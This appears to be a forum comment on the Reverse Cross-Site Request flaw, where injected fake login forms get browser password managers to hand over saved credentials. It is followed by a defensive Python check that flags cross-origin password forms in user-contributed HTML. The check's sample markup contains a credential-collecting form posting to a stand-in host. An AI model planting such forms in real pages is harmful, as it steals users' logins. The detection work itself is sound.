This is sensational journalism at its finest.
Firefox is not the only browser vulnerable to this type of exploit. IE7 and Safari are also vulnerable. This is probably the first exploit, in my memory, to affect multiple browsers on multiple platforms.
The exploit in question is a Reverse Cross-Site Request (RCSR), brought to light by last month's phishing scam on MySpace.
This vulnerability could affect anyone using Firefox, IE7, or Safari who visits a website that allows user-contributed HTML code.
The browser is not directly fooled by the RCSR exploit. Instead, the user is presented with a fake login page that fools the browser into providing the UserID and Log-In information. None of these browsers were designed to check the form data before submission.
This type of attack is particularly effective, as the user is presented with a Log-In page very similar to the one they are used to seeing on a website they trust.
Firefox developer discussion at Bugzilla Bug 360493: Cross-Site Forms + Password Manager = Security Failure
Microsoft has acknowledged the vulnerability, but inquiries by Chapin Information Services (CIS) have been met with this response from Microsoft.
“We are aware of the issue you reported.” And, “As a matter of policy, we cannot comment on ongoing investigations.”
I have located no official documentation from Apple regarding this vulnerability in Safari.
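A site that accepts user-contributed HTML can apply the check the comment above says the browsers lacked: reject any contributed form that contains a password field and submits to another origin. The following is an added example, not part of the original comment or the Bugzilla discussion; the function name, hostnames and sample markup are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url):
    """(scheme, host, port) triple used for same-origin comparison."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return (scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(scheme))

class FormAudit(HTMLParser):
    """Records password-bearing forms whose action leaves the hosting origin."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.findings, self._form = page_url, [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._finish()  # forms cannot nest; close any form still open
            # An empty or missing action submits back to the page itself.
            self._form = {"action": urljoin(self.page_url, a.get("action") or ""),
                          "password": False}
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "text").lower() == "password":
                self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._finish()

    def _finish(self):
        form, self._form = self._form, None
        if form and form["password"] and origin(form["action"]) != origin(self.page_url):
            self.findings.append(form["action"])

def cross_origin_password_forms(html, page_url):
    """Return the action URLs of contributed forms that should be rejected."""
    audit = FormAudit(page_url)
    audit.feed(html)
    audit.close()
    audit._finish()  # also evaluate a form the contributor left unclosed
    return audit.findings

# Constructed sample of user-contributed profile markup.
PAGE_URL = "https://social.example/profile/123"
SAMPLE = """<form action="https://collector.example/save" method="post">
<input type="text" name="user"><input type="PASSWORD" name="pass"></form>
<form action="/search"><input type="text" name="q"></form>
<form action="/login" method="post"><input type="password" name="p"></form>"""

if __name__ == "__main__":
    print(cross_origin_password_forms(SAMPLE, PAGE_URL))
```

Only the first form in the sample is reported: the second has no password field and the third posts back to the hosting origin.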